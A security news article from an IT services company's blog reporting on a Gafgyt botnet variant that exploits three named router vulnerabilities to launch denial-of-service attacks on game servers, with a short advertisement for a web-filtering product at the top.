New Gafgyt Botnet Targets Game Servers

Walden Systems Geeks Corner News New Gafgyt Botnet Targets Game Servers Rutherford NJ New Jersey NYC New York City North Bergen County
Rita gives you full control of what sites your employees visit. Rita can block sites that eat up your precious bandwidth such as media streaming sites. Rita enables you full control of what sites your employees can and cannot visit. Rita gives you the ability to block undesirable sites by wildcard or by name. Rita gives you the ability to determine which computers will be blocked and which will be allowed. With Rita, you can block access to sensitive servers within your LAN.

A new Gafgyt variant is using vulnerable IoT devices to target gaming servers worldwide. The new variant is capable of launching a variety of denial-of-service attacks against the Valve Source Engine, a video game engine developed by Valve Corp. Valve runs popular games such as ​Half-Life and ​Team Fortress 2. Other gaming servers have also been targeted by the botnet, such as those hosting Fortnite. Gafgyt uses remote code-execution vulnerabilities to gain access and recruit routers into botnets to attack gaming servers. This variant also competes against similar botnets, such as JenX which are frequently sold on Instagram. Researchers found several fake Instagram profiles selling the source code for the botnet at varying prices. Researchers contacted Instagram and alerted them of the profiles.

Gafgyt was first uncovered in 2014. It has become infamous for launching large scale, distributed denial-of-service attacks. The newest Gafgyt variant targets two of the same small office router remote-code-execution flaws as its predecessor, ​JenX, which was discovered in 2018​. The two flaws are CVE-2017-17215 and CVE-2014-8361. The newest variant also targets another vulnerability, CVE-2017-18368, a remote command injection bug on Zyxel P660HN wireless routers. The Zyxel P660HN-T1A has a command-injection vulnerability in the remote system log forwarding function, which can be accessed by an unauthenticated user. There are more than 32,000 Wi-Fi routers worldwide that are vulnerable to these three flaws.


The Gafgyt variant uses three scanners to attempt to exploit the known RCE flaws. The botnet makes them download either an ARM7 or MIPS binary using wget, which is a computer program that pulls content from web servers. From there, the malware connects to a command-and-control server which receives the device's information such as IP address and architecture. From there, the infected device is forced to perform five different types of DoS attacks. The Gafgyt variant can perform different types of DoS attacks simultaneously depending on the commands received from the C2 server.

The Gafgyt variant shows the dangers of insecure IoT devices. An increase of IoT botnets sold on Instagram at a low price and the presence of wireless routers across all industries means that IoT devices are at increased risk of being recruited into botnets. Every type of industry must be aware of IoT security and take measures to prevent devices on their network from getting compromised and degrading business continuity.